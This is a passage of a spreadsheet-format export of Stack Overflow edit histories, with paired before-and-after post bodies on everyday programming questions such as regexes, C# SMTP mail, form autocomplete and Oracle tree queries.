 &lt;p&gt;&lt;strong&gt;Chrome&lt;/strong&gt; has Gears baked in, so it can do threads, although it requires a confirmation prompt from the user (and it uses a different API to web workers, although it will work in any browser with the Gears plugin installed):&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;a href="http://code.google.com/apis/gears/samples/hello_world_workerpool/hello_world_workerpool.html" rel="nofollow noreferrer"&gt;Google Gears WorkerPool Demo&lt;/a&gt; (not a good example as it runs too fast to test in Chrome and Firefox, although IE runs it slow enough to see it blocking interaction)&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;IE8&lt;/strong&gt; and &lt;strong&gt;IE9&lt;/strong&gt; can only do threads with the Gears plugin installed&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Sam Hasler</t>
  </si>
  <si>
    <t>Blu</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Will this do?&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;[^\r]\n_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Basically it matches a '\n' that is preceded with a character that is not '\r'.&lt;/p&gt; _x000D_
 &lt;p&gt; If you want it to detect lines that start with just a single '\n' as well, then try&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;([^\r]|$)\n_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Which says that it should match a '\n' but only those that is the first character of a line or those that are &lt;em&gt;not&lt;/em&gt; preceded with '\r'&lt;/p&gt; _x000D_
 &lt;p&gt; There might be special cases to check since you're messing with the definition of lines itself the '$' might not work too well. But I think you should get the idea.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt; credit @Kibbee Using look-ahead s is clearly better since it won't capture the matched preceding character and should help with any edge cases as well. So here's a better regex + the code becomes:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;myStr = &lt;span class="diff-delete"&gt;Regex&lt;/span&gt;.Replace(&lt;span class="diff-delete"&gt;myStr, &lt;/span&gt;"(?&amp;lt;!\r)\n", "\r\n");_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Will this do?&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;[^\r]\n_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Basically it matches a '\n' that is preceded with a character that is not '\r'.&lt;/p&gt; _x000D_
 &lt;p&gt; If you want it to detect lines that start with just a single '\n' as well, then try&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;([^\r]|$)\n_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Which says that it should match a '\n' but only those that is the first character of a line or those that are &lt;em&gt;not&lt;/em&gt; preceded with '\r'&lt;/p&gt; _x000D_
 &lt;p&gt; There might be special cases to check since you're messing with the definition of lines itself the '$' might not work too well. But I think you should get the idea.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt; credit @Kibbee Using look-ahead s is clearly better since it won't capture the matched preceding character and should help with any edge cases as well. So here's a better regex + the code becomes:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;myStr = &lt;span class="diff-add"&gt;myStr&lt;/span&gt;.Replace("(?&amp;lt;!\r)\n", "\r\n");_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Allon Guralnek</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;Protected Sub Page_Load(ByVal sender As Object, ByVal e As EventArgs) Handles Me.Load_x000D_
    'set page &lt;span class="diff-delete"&gt;title'&lt;/span&gt;_x000D_
    Page.Title = "Something"_x000D_
    Dim r As String = "Say ""Hello"""_x000D_
    Dim i As Integer = 1234_x000D_
    Dim d As Double = 1.23_x000D_
    Dim s As Single = .123F_x000D_
    Dim l As Long = 123L_x000D_
    Dim ul As ULong = 123UL_x000D_
    Dim c As Char = "x"c_x000D_
    Dim h As Integer = &amp;amp;amp;H0_x000D_
    Dim t As Date = #5/31/1993 1:15:30 PM#_x000D_
    Dim f As Single = 1.32e-5F_x000D_
End Sub_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;Protected Sub Page_Load(ByVal sender As Object, ByVal e As EventArgs) Handles Me.Load_x000D_
    'set page &lt;span class="diff-add"&gt;title&lt;/span&gt;_x000D_
    Page.Title = "Something"_x000D_
    Dim r As String = "Say ""Hello"""_x000D_
    Dim i As Integer = 1234_x000D_
    Dim d As Double = 1.23_x000D_
    Dim s As Single = .123F_x000D_
    Dim l As Long = 123L_x000D_
    Dim ul As ULong = 123UL_x000D_
    Dim c As Char = "x"c_x000D_
    Dim h As Integer = &amp;amp;amp;H0_x000D_
    Dim t As Date = #5/31/1993 1:15:30 PM#_x000D_
    Dim f As Single = 1.32e-5F_x000D_
End Sub_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Laurel</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Be sure to use &lt;code&gt;System.Net.Mail&lt;/code&gt;, not the deprecated &lt;code&gt;System.Web.Mail&lt;/code&gt;. Doing SSL with &lt;code&gt;System.Web.Mail&lt;/code&gt; is a gross mess of hacky extensions.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;using System.Net;_x000D_
using System.Net.Mail;_x000D_
_x000D_
var fromAddress = new MailAddress("from@gmail.com", "From Name");_x000D_
var toAddress = new MailAddress("to@example.com", "To Name");_x000D_
const string fromPassword = "fromPassword";_x000D_
const string subject = "Subject";_x000D_
const string body = "Body";_x000D_
_x000D_
var smtp = new SmtpClient_x000D_
           {_x000D_
               Host = "smtp.gmail.com",_x000D_
               Port = 587,_x000D_
               EnableSsl = true,_x000D_
               DeliveryMethod = SmtpDeliveryMethod.Network,_x000D_
               UseDefaultCredentials = false,_x000D_
               Credentials = new NetworkCredential(fromAddress.Address, fromPassword)_x000D_
           };_x000D_
using (var message = new MailMessage(fromAddress&lt;span class="diff-delete"&gt;.Address&lt;/span&gt;, toAddress)_x000D_
                     {_x000D_
                         Subject = subject,_x000D_
                         Body = body_x000D_
                     })_x000D_
{_x000D_
    smtp.Send(message);_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Be sure to use &lt;code&gt;System.Net.Mail&lt;/code&gt;, not the deprecated &lt;code&gt;System.Web.Mail&lt;/code&gt;. Doing SSL with &lt;code&gt;System.Web.Mail&lt;/code&gt; is a gross mess of hacky extensions.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;using System.Net;_x000D_
using System.Net.Mail;_x000D_
_x000D_
var fromAddress = new MailAddress("from@gmail.com", "From Name");_x000D_
var toAddress = new MailAddress("to@example.com", "To Name");_x000D_
const string fromPassword = "fromPassword";_x000D_
const string subject = "Subject";_x000D_
const string body = "Body";_x000D_
_x000D_
var smtp = new SmtpClient_x000D_
           {_x000D_
               Host = "smtp.gmail.com",_x000D_
               Port = 587,_x000D_
               EnableSsl = true,_x000D_
               DeliveryMethod = SmtpDeliveryMethod.Network,_x000D_
               UseDefaultCredentials = false,_x000D_
               Credentials = new NetworkCredential(fromAddress.Address, fromPassword)_x000D_
           };_x000D_
using (var message = new MailMessage(fromAddress, toAddress)_x000D_
                     {_x000D_
                         Subject = subject,_x000D_
                         Body = body_x000D_
                     })_x000D_
{_x000D_
    smtp.Send(message);_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Domenic</t>
  </si>
  <si>
    <t>superlogical</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm not sure if it'll work in all browsers but you should try setting autocomplete="off" on the form.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;form id="loginForm" action="login.cgi" method="post" autocomplete="off"&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; The easiest and simplest way to disable Form &lt;strong&gt;and Password storage prompts&lt;/strong&gt; and prevent form data from being cached in session history is to use the autocomplete form element attribute with value &lt;span class="diff-delete"&gt;"off&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; From &lt;a href="http://developer.mozilla.org/En/How_to_Turn_Off_Form_Autocompletion" rel="nofollow noreferrer"&gt;http://developer.mozilla.org/En/How_to_Turn_Off_Form_Autocompletion&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;p&gt;&lt;span class="diff-delete"&gt; Typically, turning off autocompletion involves suppressing both the Form Manager and Password Manager dialog boxes, as well as ensuring that form information is not stored in session history for future retrievals.&lt;/span&gt;&lt;/p&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; From &lt;/span&gt;&lt;a href="http://web.archive.org/web/20031203134351/http://devedge.netscape.com/viewsource/2003/form-autocompletion/" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;http://web.archive.org/web/20031203134351/http://devedge.netscape.com/viewsource/2003/form-autocompletion/&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;Seems to work&lt;/span&gt; in IE to&lt;span class="diff-delete"&gt;.&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm not sure if it'll work in all browsers but you should try setting autocomplete="off" on the form.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;form id="loginForm" action="login.cgi" method="post" autocomplete="off"&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; The easiest and simplest way to disable Form &lt;strong&gt;and Password storage prompts&lt;/strong&gt; and prevent form data from being cached in session history is to use the autocomplete form element attribute with value &lt;span class="diff-add"&gt;"off"&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; From &lt;a href="http://developer.mozilla.org/En/How_to_Turn_Off_Form_Autocompletion" rel="nofollow noreferrer"&gt;http://developer.mozilla.org/En/How_to_Turn_Off_Form_Autocompletion&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;Some minor research shows that this works&lt;/span&gt; in IE to&lt;span class="diff-add"&gt; but I'll leave no guarantees ;)&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Markus Olsson</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; How do I get today's date in C# in &lt;span class="diff-delete"&gt;MM&lt;/span&gt;/&lt;span class="diff-delete"&gt;DD&lt;/span&gt;/&lt;span class="diff-delete"&gt;YYYY&lt;/span&gt; format?&lt;/p&gt; _x000D_
 &lt;p&gt; I need to set a string variable to today's date (preferably without the year), but there's got to be a better way than building it month-/-day one piece at a time.&lt;/p&gt; _x000D_
 &lt;p&gt; BTW: I'm in the US so M/dd would be correct, e.g. September &lt;span class="diff-delete"&gt;24th&lt;/span&gt; is 9/&lt;span class="diff-delete"&gt;24&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;em&gt;Note: an answer from kronoz came in that discussed internationalization, and I thought it was awesome enough to mention since I can't make it an 'accepted' answer as well.&lt;/em&gt;&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://stackoverflow.com/questions/32747/how-do-i-get-todays-date-in-c-in-8282008-format#32819" title="kronoz's answer"&gt;kronoz's answer&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; How do I get today's date in C# in &lt;span class="diff-add"&gt;8&lt;/span&gt;/&lt;span class="diff-add"&gt;28&lt;/span&gt;/&lt;span class="diff-add"&gt;2008&lt;/span&gt; format?&lt;/p&gt; _x000D_
 &lt;p&gt; I need to set a string variable to today's date (preferably without the year), but there's got to be a better way than building it month-/-day one piece at a time.&lt;/p&gt; _x000D_
 &lt;p&gt; BTW: I'm in the US so M/dd would be correct, e.g. September &lt;span class="diff-add"&gt;11th&lt;/span&gt; is 9/&lt;span class="diff-add"&gt;11&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;em&gt;Note: an answer from kronoz came in that discussed internationalization, and I thought it was awesome enough to mention since I can't make it an 'accepted' answer as well.&lt;/em&gt;&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://stackoverflow.com/questions/32747/how-do-i-get-todays-date-in-c-in-8282008-format#32819" title="kronoz's answer"&gt;kronoz's answer&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>OneStig</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Hibernate is written against the JDBC API. So, you need a &lt;a href="https://github.com/jprante/jdbc-driver-csv" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;JDBC driver&lt;/span&gt;&lt;/a&gt; that works with the file format you are interested in. Obviously, even for read-only access, this isn't going to perform well, but it might still be useful if that's not a high priority. On a Windows system, you can set up ODBC datasources for delimited text files, Excel files, etc. Then you can set up the JdbcOdbcDriver in your Java application to use this data source.&lt;/p&gt; _x000D_
 &lt;p&gt; For most of the applications I work on, I would not consider this approach; I would use an import/export mechanism to convert from a real database (even if it's an in-process database like Berkeley DB or Derby) to the text files. Yes, it's an extra step, but it could be automated, and the performance isn't likely to be much worse than trying to use the text files directly (it will likely be much better, overall), and it will be more robust and easy to develop.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Hibernate is written against the JDBC API. So, you need a &lt;span class="diff-add"&gt;JDBC driver&lt;/span&gt; that works with the file format you are interested in. Obviously, even for read-only access, this isn't going to perform well, but it might still be useful if that's not a high priority. On a Windows system, you can set up ODBC datasources for delimited text files, Excel files, etc. Then you can set up the JdbcOdbcDriver in your Java application to use this data source.&lt;/p&gt; _x000D_
 &lt;p&gt; For most of the applications I work on, I would not consider this approach; I would use an import/export mechanism to convert from a real database (even if it's an in-process database like Berkeley DB or Derby) to the text files. Yes, it's an extra step, but it could be automated, and the performance isn't likely to be much worse than trying to use the text files directly (it will likely be much better, overall), and it will be more robust and easy to develop.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>erickson</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; After losing some freelance work to a hard drive crash, I've become keen on the philosophy that "It doesn't exist until its in source control". As I don't want to necessarily share the source for my projects with the rest of the world, I pay for webhosting (using &lt;a href="http://www.dreamhost.com" rel="nofollow noreferrer"&gt;Dreamhost&lt;/a&gt; who have great deals on basic shared hosting and easy one-click installs for things like subversion) and store my data that way. They don't claim to be any sort of backup service, but all I really want is a second copy offsite somewhere.&lt;/p&gt; _x000D_
 &lt;p&gt; If I do decide to share the code I can always make it public later. Do note that sourceforge does not allow private/personal projects, and Google Code forces you to license your code using an open source license. Both have some limitations on the number of projects you can create (and aren't really intended to store everybody and their brother's personal projects).&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;GitHub does look quite interesting in this respect -- "GitHub was written for public, open source projects&lt;/span&gt; and &lt;span class="diff-delete"&gt;private&lt;/span&gt;, &lt;span class="diff-delete"&gt;proprietary codes" -- although it isn't free and requires learning&lt;/span&gt; a &lt;span class="diff-delete"&gt;new version control paradigm&lt;/span&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; After losing some freelance work to a hard drive crash, I've become keen on the philosophy that "It doesn't exist until its in source control". As I don't want to necessarily share the source for my projects with the rest of the world, I pay for webhosting (using &lt;a href="http://www.dreamhost.com" rel="nofollow noreferrer"&gt;Dreamhost&lt;/a&gt; who have great deals on basic shared hosting and easy one-click installs for things like subversion) and store my data that way. They don't claim to be any sort of backup service, but all I really want is a second copy offsite somewhere.&lt;/p&gt; _x000D_
 &lt;p&gt; If I do decide to share the code I can always make it public later. Do note that sourceforge does not allow private/personal projects, and Google Code forces you to license your code using an open source license. Both have some limitations on the number of projects you can create (and aren't really intended to store everybody and their brother's personal projects).&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;Assembla&lt;/span&gt; and &lt;span class="diff-add"&gt;Github both appear to be very attractive pay options&lt;/span&gt;, &lt;span class="diff-add"&gt;but your dollars go&lt;/span&gt; a &lt;span class="diff-add"&gt;lot further by paying for webhosting rather than a specific hosted app&lt;/span&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Luke</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;While&lt;/span&gt; starting to learn lisp, I've come across the term &lt;em&gt;tail-recursive&lt;/em&gt;. What does it mean&lt;span class="diff-delete"&gt; exactly&lt;/span&gt;?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;Whilst&lt;/span&gt; starting to learn lisp, I've come across the term &lt;em&gt;tail-recursive&lt;/em&gt;. What does it mean?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>jamesmstone</t>
  </si>
  <si>
    <t>amanuel2</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; We have some really old code that calls WebServices using behaviours (webservice.htc), and we are having some strange problems... since they've been deprecated a long time ago, I want to change the call.&lt;/p&gt; _x000D_
 &lt;p&gt; What's the correct way of doing it? It's ASP.NET 1.1&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; We have some really old code that calls WebServices using behaviours (webservice.htc), and we are having some strange problems... since they've been deprecated a long time ago, I want to change the call.&lt;/p&gt; _x000D_
 &lt;p&gt; What's the correct way of doing it? It's ASP.NET 1.1&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; EDIT: Please stop re-tagging when it's not needed. Refer to the &lt;/span&gt;&lt;a href="http://stackoverflow.com/questions/18557/how-does-stackoverflow-work-the-unofficial-faq"&gt;&lt;span class="diff-add"&gt;FAQ&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>juan</t>
  </si>
  <si>
    <t>Brad Tutterow</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;b&gt;&lt;a href="http://en.wikipedia.org/wiki/Russell%27s_Paradox" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;Russell's Paradox&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt;:&lt;/span&gt;&lt;/b&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt; Let X be the set of all sets that do not contain themselves. Is X a member of X?&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;a href="http://imgs.xkcd.com/comics/fetishes.png" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;alt text http://imgs.xkcd.com/comics/fetishes.png&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;a href="http://xkcd.com/468/" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;http://xkcd.com/468/&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Let X be the set of all sets that do not contain themselves. Is X a member of X?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Geoff Dalgas</t>
  </si>
  <si>
    <t>Kyle Cronin</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;Oracle: SELECT&lt;/span&gt; ... START WITH ... CONNECT BY&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Oracle has an extension to SELECT that allows easy tree-based retrieval.&lt;/p&gt; _x000D_
 &lt;p&gt; This query will traverse a table where the nesting relationship is stored in &lt;strong&gt;parent&lt;/strong&gt; and &lt;strong&gt;child&lt;/strong&gt; columns.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;select * from my_table_x000D_
    start with parent = :TOP_ARTICLE_x000D_
    connect by prior child = parent;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;a href="http://www.adp-gmbh.ch/ora/sql/connect_by.html" rel="nofollow noreferrer"&gt;http://www.adp-gmbh.ch/ora/sql/connect_by.html&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-add"&gt;SELECT&lt;/span&gt; ... START WITH ... CONNECT BY&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Oracle has an extension to SELECT that allows easy tree-based retrieval.&lt;/p&gt; _x000D_
 &lt;p&gt; This query will traverse a table where the nesting relationship is stored in &lt;strong&gt;parent&lt;/strong&gt; and &lt;strong&gt;child&lt;/strong&gt; columns.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;select * from my_table_x000D_
    start with parent = :TOP_ARTICLE_x000D_
    connect by prior child = parent;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;a href="http://www.adp-gmbh.ch/ora/sql/connect_by.html" rel="nofollow noreferrer"&gt;http://www.adp-gmbh.ch/ora/sql/connect_by.html&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I've seen it in coding standards for C++ that were a hang-over from C, as if you don't have RAII or other automatic memory management then you have to clean up for each return, which either means cut-and-paste of the clean-up or a goto (logically the same as 'finally' in managed languages), both of which are considered bad form. If your practices are to use smart pointers and collections in C++ or another automatic memory system, then there isn't a strong reason for it, and it become all about readability, and more of a &lt;span class="diff-delete"&gt;judgment&lt;/span&gt; call.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I've seen it in coding standards for C++ that were a hang-over from C, as if you don't have RAII or other automatic memory management then you have to clean up for each return, which either means cut-and-paste of the clean-up or a goto (logically the same as 'finally' in managed languages), both of which are considered bad form. If your practices are to use smart pointers and collections in C++ or another automatic memory system, then there isn't a strong reason for it, and it become all about readability, and more of a &lt;span class="diff-add"&gt;judgement&lt;/span&gt; call.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Pete Kirkham</t>
  </si>
  <si>
    <t>A. Rex</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; We generate web pages that should always be printed in landscape mode. Web browser print dialogs default to portrait, so for every print job the user has to manually select landscape. It's minor, but would be nice for the user if we can remove this unnecessary step.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; We generate web pages that should always be printed in landscape mode. Web browser print dialogs default to portrait, so for every print job the user has to manually select landscape. It's minor, but would be nice for the user if we can remove this unnecessary step.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Thanks in advance to all respondents.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Mark</t>
  </si>
  <si>
    <t>Yeldar Kurmangaliyev</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Is this what you're after?&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;select * from master.&lt;span class="diff-delete"&gt;sys&lt;/span&gt;.syslogins_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Is this what you're after?&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;select * from master..syslogins_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Zain Rizvi</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;When detecting URLs, it's always better to &lt;/span&gt;&lt;a href="http://stackoverflow.com/a/21925491/1269037"&gt;&lt;span class="diff-delete"&gt;rely on a specialized library&lt;/span&gt;&lt;/a&gt;&lt;/strong&gt;&lt;span class="diff-delete"&gt; that handles properly international domain names, new TLDs like &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;.museum&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt;, parentheses and other punctuation within and at the end of the URL, and many other edge cases.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; That said, you need to add&lt;/span&gt; a "g" to the end of the regular expression to enable global matching.&lt;/p&gt; _x000D_
 &lt;pre class="lang-js s-code-block hljs javascript"&gt;&lt;code&gt;/ig;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; For example:&lt;/p&gt; _x000D_
 &lt;pre class="lang-js s-code-block hljs javascript"&gt;&lt;code&gt;&lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;function&lt;/span&gt; &lt;span class="hljs-title"&gt;replaceURLWithHTMLLinks&lt;/span&gt;(&lt;span class="hljs-params"&gt;text&lt;/span&gt;) &lt;/span&gt;{_x000D_
    &lt;span class="hljs-keyword"&gt;var&lt;/span&gt; exp = &lt;span class="hljs-regexp"&gt;/(\b(https?|ftp|file):\/\/[-A-Z0-9+&amp;amp;@#\/%?=~_|!:,.;]*[-A-Z0-9+&amp;amp;@#\/%=~_|])/ig&lt;/span&gt;;_x000D_
    &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; text.replace(exp,&lt;span class="hljs-string"&gt;"&amp;lt;a href='$1'&amp;gt;$1&amp;lt;/a&amp;gt;"&lt;/span&gt;); _x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt; I've only fixed the problem in the question where the regular expression was only replacing the first match. The regular expression above probably misses a lot of edge cases. See the Jeff Atwood's blog post &lt;em&gt;&lt;a href="http://www.codinghorror.com/blog/2008/10/the-problem-with-urls.html" rel="nofollow noreferrer"&gt;The Problem With URLs&lt;/a&gt;&lt;/em&gt; for a better method of finding URLs in text.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Add&lt;/span&gt; a "g" to the end of the regular expression to enable global matching.&lt;/p&gt; _x000D_
